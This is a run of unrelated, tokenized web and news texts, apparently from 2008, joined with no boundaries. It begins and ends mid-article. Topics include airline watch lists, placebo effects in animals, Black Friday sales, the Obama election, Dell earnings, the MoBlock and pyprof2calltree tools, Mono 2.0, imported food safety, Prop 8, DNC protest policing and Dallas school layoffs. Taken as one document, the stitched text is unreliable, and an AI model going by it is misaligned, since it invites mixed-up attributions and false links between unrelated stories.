Individuals on this list are barred from boarding aircraft because intelligence indicates they pose a threat to aviation .
Fewer than 16,000 people are designated " selectees , " he said , and most are not Americans .
These people represent a less specific security threat and receive extra scrutiny , but are allowed to fly .
The American Civil Liberties Union has estimated more than 1 million names have been added to the lists since the September 11 , 2001 , terrorist attacks .
The FBI , which manages the Terrorist Screening Database , said in August that there were about 400,000 people on its list , but that approximately 95 percent of those people were not U.S. citizens .
Watch more about the no fly lists »
But even if there are only 18,500 names on the no fly and selectee lists , thousands of people not on the lists are mistaken for those who are .
They are often subjected to extra security at airports because their names are similar to ones on the lists .
A government program unveiled Wednesday is aimed at addressing that problem .
Under the program , Secure Flight , travelers will be asked to provide their full name , date of birth and gender when making airline reservations .
The encrypted information will then be transmitted to the Transportation Security Administration , which will run it against the watch lists .
The Department of Homeland Security believes the few pieces of additional information will dramatically reduce the number of people falsely identified as being on a watch list .
Currently , individual airlines compare the names on manifests with the no-fly and selectee lists .
Their performance has been uneven , according to the Transportation Security Administration .
Chertoff says having the government do the matching should improve efficiency and security .
The ACLU welcomed the privacy protections in the program , but Barry Steinhardt , director of the ACLU 's Technology and Liberty Program , said it is based on " a hopelessly bloated watch list that has over a million names on it . "
" It still is going to result in countless Americans being either denied boarding to a plane or being stopped [ and ] aggressively searched at airports , " he said .
All About Air Travel • U.S. Department of Homeland Security
Shares
One of the occasional arguments used in support of “ alternative ” approaches to human medicine is the observation that since “ alternative ” medicine is used ( with anecdotal success ) in animals , and animals do n’t know anything about the treatment that they ’re getting , then they must work a priori .
Of course , the fallacy of such an observation is pretty obvious to anyone with a logical / skeptical frame of mind , because it assumes that the therapies do work ( even though there ’s little evidence of that ) .
Clearly , however , some people perceive that the therapies work , including veterinarians – there are veterinary acupuncturists , chiropractors , homeopaths , etc. , etc .
Since there ’s very little scientific support for the idea that the therapies actually have any clinically significant effect on biological processes , including the processes that result in disease , questions arise as to whether there are other effects of “ alternative ” treatments on animals .
Specifically , people may wonder whether or not animals can benefit from placebo effects .
Fully discussing placebo effects is a topic for another blog ( or several other blogs ) .
Regardless , whether or not placebo effects exist in human medicine , there is little evidence that they exist in animals .
( 1 ) In general , for a placebo response to occur , it would seen require that the patient being treated recognize that there is an intentional effort to treat .
Animals would appear to lack the ability to comprehend such intentions ( other than they may not like a particular intervention ) .
As such , animals would not be able to participate in placebo - generating experiences .
So , for example , one could n’t rationally suggest to a dog that a particular therapy might help it get better , or that it was beneficial because it was “ natural ; ” one presumably would n’t wax eloquent to a horse that a particular therapy might give it a window of hope for recovery .
They just would n’t understand .
Still , there are many explanations for how a placebo - like effect might be explained in animals .
Take conditioning .
Conditioning theory proposes that bodily changes result following exposure to a stimulus that previously produced that change .
This is perhaps the most intuitively acceptable explanation for any placebo effects in animals .
Indeed , animal studies support such a model for placebo effects , starting with the first descriptions on salivating dogs by Pavlov .
( 2 ) Both human and animal studies support the idea that conditioning forms some basis for placebo responses .
( 3 ) Since conditioning requires learning , it would be expected that repeated visits to a practitioner ( of any particular persuasion ) might increase the strength of the association between a learned stimuli and response in animals , good or bad .
There are numerous examples of dogs shaking in fear when being taken into a veterinary clinic ; on the other hand , a dog that enjoyed being handled in a soothing environment might appear to receive some relief from a chronic condition ; as it learned to associate its visits with the comforting handling , conditioning effects could occur .
This could certainly serve as reasonable explanations for purported placebo effects in animals .
Nevertheless , the hypothesis that a healing or therapeutic effect can be dependably provoked as a result of conditioning cannot be supported at this time by any evidence .
Expectancy theory proposes that bodily changes may occur to the extent that the person receiving the therapy expects them to .
There is considerable overlap between expectancy and conditioning , because learning is one of the major ways that expectancies are formed .
To the extent that therapies are expected to provide relief from disease , or at least provide the client and / or veterinarian with a feeling of control over the disease process , they may alleviate adverse mental states ( in the humans ) .
Certainly , in humans , therapies that help restore patient control may evoke therapeutic effects , at least short term , but studies that investigate the expectancy model in animals have so far not been performed .
Still , if animals were able to form an association between treatment - related signals ( the attention and handling received , the way that the owner behaves towards the animal when it is receiving treatment ) and the relief of its distress , expectancies of treatment effects might develop ( on the part of both animal and owner ) .
There is a good body of research that demonstrates that human contact has measurable effects on animals .
For example , petting by humans reduces heart rates in dogs ( 4 ) and horses ( 5 ) and causes major vascular changes in dogs .
( 6 ) Gentle handling increases productivity in dairy heifers ( 7 ) and increases reproductive efficiency in sows .
( 8 ) Thus , it is plausible that human - animal contact might play an important role in the observed responses to therapeutic interventions .
To take an “ alternative ” example , it has been shown that a single acupuncture treatment is as effective as petting a horse , when it comes to relief of signs of chronic airway disease ; that is , there ’s no demonstrable effect of acupuncture beyond simple handling .
( 9 ) On the other hand , handling may also be stressful to animals , so responses to handling may not necessarily be beneficial .
Still , there ’s no question that human contact can invoke responses from animals and animals may behave quite differently when they are not being observed ; those should n’t be confused with placebo - effects , however .
Can Therapies Induce Placebo Effects in Owners ?
The reported intensity of subjective symptoms such as pain , fatigue , and depressed mood in an animal may vary over time for all sorts of reasons , not all of which have to do with actual changes in symptom severity .
Further complicating such analyses are treatment effects that might exist on the part of both the animal owner , as well as the veterinarian with a personal investment in an “ alternative ” approach .
Client expectations can be very powerful motivators .
Having participated in a therapeutic transaction , clients generally expect to see some results .
Optimistic owners may be more likely to diligently pursue treatments .
Even failing obvious results , normal reciprocal responses often result in clients reporting improvement , at least initially , even when no improvement has occurred .
At the very least , veterinarians can help clients understand what problems are occurring in the animal – such comfort and reassurance may make a problem easier for the client to deal with .
That ’s a good thing , mostly , unless the veterinarian steers the client into areas that are unsupported by evidence .
Good veterinary care should include a healthy dose of understanding and compassion , and veterinarians should be interested in proven effective care .
However , there ’s no evidence whatsoever that animals can benefit from , or even experience , placebo effects .
Indeed , when doctors claim effectiveness for a treatment beyond the evidence in the belief that they are doing the patient a favor by inducing a “ placebo effect ” to the animal ’s supposed benefit , they are abusing three trusted roles : expert , authority figure , and comforter .
Animals deserve better .
REFERENCES
McMillan , FD .
The Placebo Effect in Animals .
J Am Vet Med Assoc 1999 ; 215 ( 7 ) : 992-9 . Pavlov , IP .
Conditioned Reflexes .
London : Oxford Press , 1927 . 23 –78 .
Voudouris , NJ , Peck , CL , Coleman , G. Conditioned placebo responses .
J Pers Soc Psychol 1985 ; 48 : 47-53 .
Gantt , WH , Newton , JO , Royer , FL , et al .
Effect of person .
Conditional Reflex 1966 ; 1 : 18-35 .
Lynch , B . Heart rate changes in the horse to human contact .
Psychophysiology 1974 ; 11 : 472-478 . Newton , JF , Ehrlich , WW .
Coronary blood flow in dogs : effect of person .
Conditional Reflex 1966 ; 1 : 81 . Gross , WB .
The benefits of tender loving care .
Int J Stud Anim Prob 1980 ; 1 : 147-149 .
Heinsworth , PH , Brand , A , Willems , PJ .
The behavioral response of sows to the presence of human beings and their productivity .
Livestock Prod Sci 1981 ; 8 : 67 - 74 .
Wilson , DV , Berney , CE , Peroni , DL , et al .
The effects of a single acupuncture treatment in horses with severe recurrent airway obstruction .
Equine Vet J 2004 ; 36 ( 6 ) : 489-94 .
Deals ring out for early shoppers More Videos Shoppers rush to grab hot deals on electronics like flatpanel TVs and Blu - Ray players at Wal - Mart .
Discount hunters hit a J.C. Penney store at 4 a.m. Friday at the Columbia Mall in Grand Forks , N.D. Quick Vote
How much do you plan to spend on Black Friday ? $ 0
$ 1-$ 100
$ 101 - $ 500
$ 500 + or View results The Nike outlet in Woodburn Company Stores in Woodburn , Ore. , opened its doors to shoppers on Thanksgiving Day .
NEW YORK ( CNNMoney.com ) --
Black Friday appeared to start strong this year , but analysts warned that the robust start to the critical holiday shopping period could fade as the weekend progressed .
" [ Shoppers ] know exactly what they want , where to shop for it and who has the best deals , " said Britt Beemer , retail analyst and chairman of America 's Research Group .
Based on this trend , the big difference this year from years past is that Beemer does n't expect people will deviate from their shopping lists .
That 's a problem for merchants who depend just as much on the impulse buy as they do on consumers ' shopping lists to get them off to a flying start on Black Friday .
Scenes from Black Friday 2008
" I talked to a number of people standing in line in stores today .
All had lists .
And the lists had no more than three items , " Beemer said .
" The real question is whether there 'll be anyone left [ in stores ] by midday . "
The holiday excitement took a tragic turn at a Wal - Mart in Valley Stream , N.Y .
Police confirmed that a 34 year - old temporary employee was trampled to death at the opening of the store in the New York suburbs .
A pregnant woman was taken to a hospital for observation .
" " Our thoughts and prayers go out to the families of those impacted , " Hank Mullany , Wal - Mart 's president for the Northeast , said in a statement .
He said the company is cooperating with a police investigation into the incident .
( more on Black Friday violence )
Early start
With a weak economy in the background , bargain hunters gathered to snag special deals from anxious merchants who opened stores as early as 12:01 a.m .
Some malls reported higher traffic in the morning hours this year compared to last year .
At Atlanta 's Lenox Square mall , the parking lot was 30 % full by 5:30 a.m. with an estimated 2,000 shoppers .
" There were lots of bags from Macy 's and other retailers indicating shoppers are purchasing more merchandise this year , " said Les Morris , spokesman for Simon Property Group .
the nation 's largest mall operator .
Lori Johnson , mother of three , came to Toys R Us at the Rockaway Townsquare Mall in New Jersey shortly after 5 a.m. , straight from her bartending job .
" It 's Black Friday .
You have to shop on Black Friday , " Johnson said , hands filled with shopping bags .
" As long as I still have money , I 'll last . "
Johnson and her sister , Tammy Bohn , purchased video games for 50 % off .
The early reports of big crowds looked positive to retailers because the holiday shopping period , which unofficially kicked off Friday , can account for as much as 50 % or more of sellers ' annual profits and sales .
The day is dubbed " Black Friday " because of its importance in determining a store 's profitability for the year .
Most merchants have had an extremely difficult sales year as Americans seriously retrenched on their shopping habits in light of a worsening economy .
What 's more , a record slump in consumer spending has already forced leading store chains such as Circuit City and Sharper Image into bankruptcy .
Given this scenario , the National Retail Federation ( NRF ) forecast holiday sales to rise just 2.2 % this year , which would make it the weakest sales gain in six years .
But despite what looked like a robust start for retailers , NPD Group 's chief retail analyst Marshal Cohen said he estimates that the lines of early - bird shoppers seemed 20 % less than last year .
Cohen , too , cautioned that the early buying frenzy could peter out by 10 a.m. , or once the doorbuster deals that are only offered for a few hours were over .
" Shoppers definitely have a mission this year , " Cohen said .
" They are serious about finding the best deals .
They are very budget conscious , they 've done their research and then they 'll go home . "
Both Beemer and Cohen project a first - ever decline in total holiday sales .
Cohen forecasts a 3 % drop while Beemer estimates sales for November and December combined will slip 1 % .
However , there was pent - up demand for some items .
Consumers were flocking to hot deals on electronics .
A Best Buy ( BBY , Fortune 500 ) store in Paterson , N.J. , had a long line of people waiting from as early as 8 p.m. on Thanksgiving Day , according to Chuck O'Donnell , Best Buy 's district services manager for New Jersey .
" We 're bringing people into the store in waves .
There are just so many of them , " O'Donnell said , adding that most of the shoppers were eager to pick up deals on laptops , digital cameras and iPods .
O'Donnell said he expected flat - panel TV shoppers to come later in the day .
A busy Black Friday at Wal - Mart
Flatscreen TVs , Blu - Ray players , vacuum cleaners and toys were selling fast at a Wal - Mart ( WMT , Fortune 500 ) store at Fairfax , Va . Industry watchers expect the No. 1 retailer to emerge as a big winner by Christmas because of its value prices .
The hottest items at the Rockingham Park Mall in Salem , N.H. , were Nintendo 's Wii Fit and Guitar Hero videogames .
Lines snaked around the block at Toys R Us ' flagship store in New York 's Times Square before its 5 a.m. open .
" I did n't think it would be this [ crowded ] , with the economy the way it was , but I guess Toys ' R ' Us was offering the best deals , so this is where everyone came , " said shopper Nicole Williams , 29 , of New York City at the toy merchant 's flagship store in Times Square .
Cold shoppers seek hot toy deals
Gerald Storch , CEO of Toys R Us , said people were in line at 9 p.m. Thursday outside the Times Square store .
" I am excited and optimistic about today and the rest of the holiday season , " Storch said .
One interesting trend , Storch pointed out , was that shoppers were n't necessarily buying lower - priced toys .
Storch said some of the fastest - selling toys in the first hour after the store opened were the $ 60 Elmo Live and the $ 139.99 Spike the Ultra Dinosaur from Fisher - Price .
" I'm not that surprised that parents are spending money on their kids , and they want to buy a good , quality toy , " he said .
" Parents tell us that they will cut back on themselves , but not on Christmas gifts for their kids . "
Every sale crucial for merchants
The J.C. Penney store at the Columbia Mall in Grand Forks , N.D. , was packed as early as 4 a.m.
Penney 's customers were bagging bargains on home products and winter clothing .
Penney announced that its Black Friday sale this year will have " the most compelling Black Friday prices ever offered in the Company 's history " with more than 400 categories of products featuring deep discounts .
" Given the current economic environment , [ the company ] understands the issues facing our customers , and we are committed to offering the season 's most affordable gifts , " said Ken Hicks , president and chief merchandising officer for J.C. Penney .
However , retail analysts say merchants have to keep the shopping momentum alive not just on Friday but over the weekend as well .
This will be a real challenge .
While consumers are cutting back on how much they spend on gifts , the NRF estimates that Black Friday and the Thanksgiving weekend will also likely see fewer Americans hitting stores .
The trade group said about 128 million people will commence their gift buying this Friday , Saturday or Sunday after Thanksgiving , down from 135 million last year .
Some retailers did n't bother waiting until Black Friday to jumpstart their holiday sales .
The Nike store at the Woodburn Company Stores in Woodburn , Ore. , opened its doors at 8:45 p.m. Thursday .
" Nike had a line that wrapped across the front of the center and past five other stores , " said Kristy Kummer , marketing director for Woodburn Company Stores .
Still , Beemer remained unconvinced that retailers will see a decent start to the holiday season .
" It will be a disappointment , " he said .
-- CNN senior correspondent Allan Chernoff , CNN's Christina Cinnici , and CNNMoney.com staff writers David Ellis and Catherine Clifford contributed to this report
“ This is a historic election , and I recognize the significance it has for African - Americans and for the special pride that must be theirs tonight , ” Mr. McCain said , adding , “ We both realize that we have come a long way from the injustices that once stained our nation ’s reputation . ”
Not only did Mr. Obama capture the presidency , but he led his party to sharp gains in Congress .
This puts Democrats in control of the House , the Senate and the White House for the first time since 1995 , when Bill Clinton was in office .
The day shimmered with history as voters began lining up before dawn , hours before polls opened , to take part in the culmination of a campaign that over the course of two years commanded an extraordinary amount of attention from the American public .
As the returns became known , and Mr. Obama passed milestone after milestone — Ohio , Florida , Virginia , Pennsylvania , New Hampshire , Iowa and New Mexico — people rolled spontaneously into the streets to celebrate what many described , with perhaps overstated if understandable exhilaration , a new era in a country where just 143 years ago , Mr. Obama , as a black man , could have been owned as a slave .
For Republicans , especially the conservatives who have dominated the party for nearly three decades , the night represented a bitter setback and left them contemplating where they now stand in American politics .
Mr. Obama and his expanded Democratic majority on Capitol Hill now face the task of governing the country through a difficult period : the likelihood of a deep and prolonged recession , and two wars .
He took note of those circumstances in a speech that was notable for its sobriety and its absence of the triumphalism that he might understandably have displayed on a night when he won an Electoral College landslide .
“ The road ahead will be long , our climb will be steep , ” said Mr. Obama , his audience hushed and attentive , with some , including the Rev. Jesse Jackson , wiping tears from their eyes .
“ We may not get there in one year or even one term , but America , I have never been more hopeful than I am tonight that we will get there .
I promise you , we as a people will get there . ”
The roster of defeated Republicans included some notable party moderates , like Senator John E. Sununu of New Hampshire and Representative Christopher Shays of Connecticut , and signaled that the Republican conference convening early next year in Washington will be not only smaller but more conservative .
WASHINGTON ( Reuters ) - U.S. industrial production fell a sharp 2.8 percent in September , the biggest decline since December 1974 , according to a report on Thursday that was likely to reinforce fears of a recession .
Economists had expected a decline of 0.8 percent , after a revised 1 percent decline in August , initially reported as a 1.1 percent fall .
The Federal Reserve said in the report the September drop was exacerbated by Hurricanes Gustav and Ike , as well as a strike at aircraft maker Boeing .
Business equipment production was off 7 percent , while consumer goods were down 1.4 percent .
For the third quarter as a whole , industrial production decreased at an annual rate of 6 percent .
Economists were already warning that the economy may have contracted in the third quarter after surprisingly weak September retail sales .
MoBlock ist eine kostenlose Software zum Blockieren von Verbindungen zu und von einem bestimmten Bereich von Hosts .
Moblock ist ein IP - Adressfilterprogramm für Linux , das ähnlich wie PeerGuardian für Microsoft Windows funktioniert .
Es verwendet die Bibliotheken iptables libnetfilter_queue und das Kernelmodul NFQUEUE .
Die Entwicklung wurde zugunsten des offiziellen PeerGuardian Linux von Phoenix Labs eingestellt und Teile des Codes wurden in PeerGuardian Linux zusammengeführt .
MoBlock Download
https://sourceforge.net/projects/moblock.berlios/
PeerGuardian Linux
https://sourceforge.net/projects/peerguardian/
A scientist in Taiwan has invented the world 's first chlorophyll organic battery that can supply electricity within 10 seconds of being wetted with water , beverages or even urine .
Chungpin Hovering Liao , a professor at the Graduate School of Electro - Optic and Material Science of National Formosa University in central Taiwan 's Yunlin County , told a news conference Wednesday that the battery , when wetted , can provide electricity for two days to a week .
While the strength of the battery is about half that of an ordinary battery , its storage capacity is more than that of Japan 's water - powered fuel cells , he said .
The production cost of the chlorophyll organic battery is very cheap -- about NT $ 1 to NT $ 2 ( US$.03 to US$ .06 ) , Liao said , adding that the battery contains no toxic substances and will not pose an environmental hazard , even if discarded at will .
The professor disclosed that he is in the process of applying for patent in Taiwan , the United States and other countries for the new invention and expects to see mass production in the near future .
Liao , 49 , received a B.S. degree in nuclear engineering from National Tsing Hua University in Hsinchu , Taiwan , in 1982 .
He earned M.S. and Ph.D. degrees in plasma science and fusion technology from the Massachusetts Institute of Technology of the United States in 1989 and 1992 , respectively .
Dell , one of the world ’s largest makers of personal computers , reported better - than - expected earnings on Thursday as the company ’s cost - cutting efforts  including the elimination of 8,300 jobs over the last year  blunted the pain from falling revenues in the early stages of the world economic slowdown .
With most economists predicting that the deepening slump will hammer corporate technology spending over the next year , Dell said it intended to keep slicing costs and would be cautious with its $ 8.9 billion cash hoard even as it realigns its business model from a direct - sales model to one that relies more on retailers to sell its laptops and desktop PCs .
Dell , based in Round Rock , Tex. , reported revenue of $ 15.16 billion in the third quarter , which ended Oct. 31 .
That was a 3 percent drop from the same quarter a year earlier and more than a billion dollars shy of the $ 16.22 billion that analysts had expected , according to Thomson Reuters .
But the company ’s profits greatly exceeded Wall Street ’s forecasts , largely because of the company ’s strong emphasis on cost cutting and a gradual shift toward more profitable products .
Overview Script to help visualize profiling data collected with the cProfile Python module with the kcachegrind ( screenshots ) graphical calltree analyser .
This is a rebranding of the venerable http://www.gnome.org/~johan/lsprofcalltree.py script by David Allouche et Al .
It aims at making it easier to distribute ( e.g. through PyPI ) and behave more like the scripts of the debian kcachegrind - converters package .
The final goal is to make it part of the official upstream kdesdk package .
Command line usage Upon installation you should have a pyprof2 calltree script in your path : $ pyprof2 calltree -- help usage : pyprof2calltree [ - h ] [ - o output_file_path ] [ - i input_file_path ] [ - k ] [ - r scriptfile [ args ... ] ] optional arguments : -h , -- help show this help message and exit -o output_file_path , -- outfile output_file_path Save calltree stats to < outfile > - i input_file_path , -- infile input_file_path Read Python stats from < infile > -k , --kcachegrind
Run the kcachegrind tool on the converted data -r scriptfile [ args ... ] , -- run -script scriptfile [args ...]
Name of the Python script to run to collect profiling data
Python shell usage pyprof2 calltree is also best used from an interactive Python shell such as the default shell .
For instance let us profile XML parsing : >>> from xml.etree import ElementTree >>> from cProfile import Profile >>> xml_content = ' < a >
' + '\t<b/><c><d>text</d></c>
' * 100 + '</a>' >>> profiler = Profile ( ) >>> profiler.runctx ( ... " ElementTree.fromstring (xml_content ) " , ... locals ( ) , globals ( ) ) >>> from pyprof2 calltree import convert , visualize >>> visualize ( profiler.getstats ( ) ) # run kcachegrind >>> convert ( profiler.getstats ( ) , ' profiling_results.kgrind ') # save for later or with the ipython : In [ 1 ] : % doctest_mode Exception reporting mode : Plain Doctest mode is : ON >>> from xml.etree import ElementTree >>> xml_content = ' < a >
' + '\t<b/><c><d>text</d></c>
' * 100 + '</a>' >>> % prun - D out.stats ElementTree.fromstring(xml_content ) *** Profile stats marshalled to file ' out.stats ' >>> from pyprof2 calltree import convert , visualize >>> visualize ( ' out.stats ' ) >>> convert ( ' out.stats ' , ' out.kgrind ' ) >>> results = % prun - r ElementTree.fromstring(xml_content ) >>> visualize ( results )
Mono Project Releases 2.0
by Ostatic Staff - Oct. 07 , 2008
Related Blog Posts Moonlight 1.0 Beta Available
People often think of open source as being purely a Linux and BSD thing .
Perhaps they 're aware of open source on OS X as well , but in general Windows is seen as hostile to open source .
And at the heart of the hostility surely must be Microsoft 's proprietary .NET framework , right ?
But no : the Mono Project provides a cross-platform , open source implementation of .
NET .
Version 2.0 was released this week , and it has matured into a serious development framework .
Available for a variety of platforms ( including Linux , Windows , OS X , and Solaris ) , Mono provides implementations of a number of core .
NET APIs , including ADO.NET 2.0 , ASP.
NET 2.0 , Windows .
Forms 2.0 , and the LINQ bits in System .
Core and System.Xml.Linq .
They do n't cover the entire .
NET API , but there 's plenty here that an experienced Windows , Microsoft .NET developer will find familiar .
Both C# 3.0 and VB8 are implemented by Mono 2.0 .
In addition to the clean room implementation of the .NET APIs , Mono includes a number of APIs of its own designed to make it possible to port .NET applications off of the Windows platform .
These include bindings to GtK+ , SQLite , and Posix libraries .
Obviously a Windows developer will need to learn new things to use these APIs , but they follow .NET design principles so the learning curve is fairly shallow .
There are also a variety of tools available for Mono developers , including a cross- platform IDE , a documentation framework , a debugger , and a code - checking tool .
The bulk of the code in Mono is released under the MIT X11 license , with the runtime being under the LGPL .
When the Mono Project was first announced , some people worried that Microsoft would step in and squash them with intellectual property lawsuits whenever they felt it was convenient .
But now that it 's been around for a few years , it seems safe to lay those concerns to rest .
Now that Microsoft is even collaborating with the Mono authors on porting SilverLight , it seems that the project has the Redmond stamp of approval - and it would be difficult in any case to assert IP claims after such a long delay .
There are other ways to port .NET applications to multiple platforms ( such as Mainsoft 's commercial tools ) , but for the average developer , Mono represents a free and mature implementation of the core of .
NET .
The past decade witnessed the massive offshoring of jobs to low - cost countries , decimating the U.S. manufacturing base .
Today , Americans are being challenged by the financial crisis , which has left much of the service economy in shambles .
Yet another avalanche may be on the horizon : the lure , and potential liability , of cheap food .
Almost a quarter of the average American 's food is imported .
But increasingly , imports are from developing countries that do not meet U.S. standards regarding sanitation , worker safety , environmental practices , quality of ingredients and treatment of animals .
China is not only providing a larger share of seafood , fruits , vegetables and ingredients for processed foods , it also has a virtual monopoly as a supplier of vitamins , food supplements and many ingredients in pharmaceuticals .
Ordinary Americans learned of the consequences of the gaping loopholes in the financial sector regulations .
Yet few know that the government is also ill - equipped to manage the complex web of global food supply chains .
This lack of transparency , coupled with a highly fragmented U.S. food safety infrastructure , enables unscrupulous suppliers .
There are 12 federal agencies administering 35 different food safety laws .
The Food and Drug Administration inspected only 52 Chinese plants from 1998 to 2005 .
At U.S. ports , only 1 percent of imported food is tested for biological contaminants .
Once found , contaminated food is returned to the source , but the odds are high that the tainted food will be returned to America and evade testing .
To make matters worse , the FDA does not check for nonorganic contaminants , such as heavy metal , that may be present in produce , fish and dietary supplements .
Moreover , savvy suppliers sometimes reroute products , especially seafood , to an inland port such as Las Vegas - which has no FDA inspectors .
The United States allows the importation of processed chickens from China - chickens bred and killed in Mexico , and shipped to China frozen and returned for sale in the United States .
Wal - Mart sells presumably U.S. - caught shrimp that was processed in China .
The bottom line : A significant amount of food can cross the ocean several times before entering the United States - without ever being inspected .
The debacle of the 2007 pet food recalls shows that even the most reputable brands can be contaminated by minuscule ingredients - in this case , melamine - tainted wheat and rice gluten .
Months passed before the FDA determined the root cause .
The list of recalls grew day by day , creating a huge supply disruption as retailers ' shelves remained empty .
Most consumers are unaware that melamine has been found in the urine of U.S. livestock from melamine - imported feed .
And more than 2,500 metric tons of imported Chinese dairy ingredients and products entered the U.S. food system in 2007 .
Although the FDA contends there is " no risk " to humans , there is little research on its cumulative effects , and kidney ailments were found in thousands of Chinese babies drinking melamine - laced milk .
A 2008 federal study reports that the prevalence of chronic kidney disease in the United States has increased from 20 percent to 25 percent in the past decade - and for older Americans , it is significantly higher .
Is it a coincidence that these trends parallel the imports from China ?
The problem is that we just do n't know .
Traditionally , food was more regional , grown and processed closer to the point of consumption .
Western food today has been transformed by consolidation and commoditization , where large conglomerates buy and sell a wide range of ingredients globally .
These days , " low price is king . "
In China , rules are often broken - and quietly cutting corners is viewed as a survival strategy .
Only recently have U.S. authorities implemented regulations regarding country - of - origin labeling for fresh meat , fish , fruits and vegetables .
However , such labeling is not required with even the slightest processing , such as cut - up fresh fruits and stuffed fish at the grocers or imported processed chicken .
Few consumers would know that globally sourced food ingredients are in everyday items with familiar brand names like Nutri - Grain bars and Sara Lee bread .
" Ingredient sourcing " is veiled in much secrecy - distributors do n't want you to know where they get your food .
Marketing hype and well - crafted packaging of branded processed foods - even many of those labeled " organic " - often lead us to believe that their ingredients are from U.S. farms .
But organic does n't always mean domestic .
One thing is clear :
The current solutions to food quality are not sustainable .
Quality risk in global food supply chains cannot be eliminated by fiats , inspections , auditing and testing .
For their part , consumers must take deliberate actions and vote with their pocketbooks .
They can seek out information on ingredients traced back to the country of origin , and press for shorter supply chains by requesting more local sourcing at retail establishments .
Companies can make available , when asked , ingredient sourcing information .
Food companies should look beyond costs to ensuring quality and consistent enforcement of U.S. standards in the supply chain , from the farm to the fork .
The government needs to play a more interventionist role .
U.S. policy can move domestic farming toward more sustainable practices and maintaining a more diverse crop mix needed for food ingredients - and future leverage .
Finally , because the safety of food ingredients sourced from developing countries cannot be inspected or regulated , setting up facilities in host countries - like the FDA in China - provides an opportunity to better understand the root causes of food problems and hasten those nations ' path to global standards .
The Obama administration should also consider a Cabinet - level agency with authority over all food safety , enforcement and research .
Our health may depend on it .
Pam's House Blend :
Hypocrisy much ?
The Church of Jesus of Christ of Latter - day Saints is unhappy about the fact that the media spotlight is trained on its participation in making Prop 8 happen .
In an official statement on the church 's web site , bearing false witness and hypocrisy is the order of the day .
It is disturbing that The Church of Jesus Christ of Latter - day Saints is being singled out for speaking up as part of its democratic right in a free election .
Members of the Church in California and millions of others from every faith , ethnicity and political affiliation who voted for Proposition 8 exercised the most sacrosanct and individual rights in the United States - that of free expression and voting .
While those who disagree with our position on Proposition 8 have the right to make their feelings known , it is wrong to target the Church and its sacred places of worship for being part of the democratic process .
Once again , we call on those involved in the debate over same - sex marriage to act in a spirit of mutual respect and civility towards each other .
No one on either side of the question should be vilified , harassed or subject to erroneous information .
Bzzt .
Wrong answer .
The people protesting the church 's significant role in an another state 's democratic process -- members of the Church of Jesus Christ of Latter - day Saints gave millions of dollars to remove the civil rights of human beings -- are merely exercising their right to free speech to highlight that role .
And what is this " erroneous information " ?
Who knows , the church does n't say . [..]
And the Catholic church is also lying baldly :
Meanwhile , the Roman Catholic Church was also a target for supporting Proposition 8 .
" Proposition 8 is not against any group in our society .
Its sole focus is on preserving God 's plan for people living upon this earth throughout time , " Cardinal Roger Mahony , archbishop of the Diocese of Los Angeles , said in a statement Thursday .
WTF ?
Wait a minute .
Prop 8 just removed an existing right from one specific group of people .
There 's no way to whitewash this .
There 's no spin that takes away the fact that religious institutions that backed Proposition 8 did so because of their faith -- interfering with the laws of California .
When a Jefferson County deputy unleashed pepper spray at unruly protesters on the first night of the Democratic National Convention , he did not know that his targets were undercover Denver police officers .
Now the American Civil Liberties Union of Colorado is questioning whether that staged confrontation by police pretending to be violent inflamed other protesters or officers during the most intense night of the four - day event .
The protest occurred Aug. 25 at 15th Street and Court Place near Civic Center .
Police ultimately arrested 106 people , the highest number of arrests in a single day during the convention .
According to a use - of - force police report obtained by the ACLU , undercover Denver detectives staged a struggle with a police commander to get pulled out of the crowd without blowing their cover .
The commander knew they were working undercover , and the plan was to pull them out of the crowd and pretend they were under arrest so protesters would be none the wiser .
A Jefferson County deputy , unaware of the presence of undercover police , thought that the commander was being attacked and used pepper spray on the undercover officers .
The report says that the commander and an undercover detective were sprayed , but it does not indicate how many others were affected .
The report also does n’t say whether the pepper spray used on the undercover police was the first deployment of chemicals that night or whether the riot was already underway .
Denver police have said they were trying to control the crowd moving from Civic Center .
The officers testified in court that they had intelligence that anarchists planned to gather in the park , then move toward the 16th Street Mall to wreak havoc at delegate hotels and other businesses .
The activists had posted that plan on a publicly available website .
Probe requested
On Thursday , the ACLU of Colorado sent a letter to Denver ’s Independent Monitor , Richard Rosenthal , asking for the Internal Affairs Bureau to conduct an investigation of the pepper - spraying incident .
“ The actions of the undercover detectives on August 25 , 2008 , may have had the effect of exacerbating an already ‘ tense situation , ’ as their feigned struggle led nearby officers and the public to believe that a commanding officer was being attacked by protestors and that the situation necessitated the use of chemical agents , ” says the letter , written by ACLU staff attorney Taylor Pendergrass .
“ Such actions may have escalated the overall situation by causing officers on the scene to fear that the protestors threatened their safety , when in fact the struggle was only between uniformed officers and undercover officers , ” he wrote .
Denver Police Chief Gerald Whitman did not return a call seeking comment about the pepper - spray incident and whether the officers followed protocol by staging a disturbance with the commander .
Rosenthal said he had received the ACLU ’s letter about the pepper - spray incident .
He also received a letter from the ACLU last week requesting a probe into possible conflicting or false statements by police about the riot and whether the department withheld evidence in some of the protesters ’ criminal trials .
The ACLU contends videos show that protesters , as well as otherwise uninvolved onlookers , were never ordered or given a chance to disperse before they were surrounded and detained by police .
“ The letters have been received , and I am in the process of reviewing and evaluating them , ” Rosenthal said Thursday .
As many as 60 protest suspects declined to accept plea deals after their arrests .
Some cases have been dismissed and some suspects acquitted after a judge cited a lack of evidence .
Felisa Cardona : 303-954-1219 or fcardona@denverpost.com
( CNN ) -- The Dallas , Texas , school district laid off hundreds of teachers Thursday to avoid a projected $ 84 million deficit .
Second - grade teacher Sandy Keaton says her students lose with the Dallas schools job cuts .
" Today is a day of tremendous sadness throughout the district , " Dallas Independent School District Superintendent Michael Hinojosa said in a written statement .
" These teachers and counselors are people who devoted themselves to helping Dallas students , and we will do everything within our power to help them find new jobs . "
The district laid off 375 teachers and 40 counselors and assistant principals Thursday , and transferred 460 teachers to other schools within the district .
The deficit was caused by a massive miscalculation in the budget , CNN affiliate WFAA - TV reported .
Children , one crying , crowded Thursday around Mary Crose , a music teacher at San Jacinto Elementary School .
" I 've had them since they were in kindergarten , " she told The Dallas Morning News , as she wrapped her arms around two of the children .
" We 've been through a lot at our school , and it 's going to be so hard .
We need the prayers and support of everyone in Dallas . "
" Why do you have to leave ? " a girl wailed , through her tears .
Do n't Miss WFAA : Dallas loses ' some of the best teachers '
WFAA : Dallas loses ' some of the best teachers '
Teachers want to flunk new grading policy
" I 've been looking at some of the notes they 've already written , " Crose said , unfolding several pieces of notebook paper .
A pink heart had been drawn on one .
Words were scrawled on others in crayon .
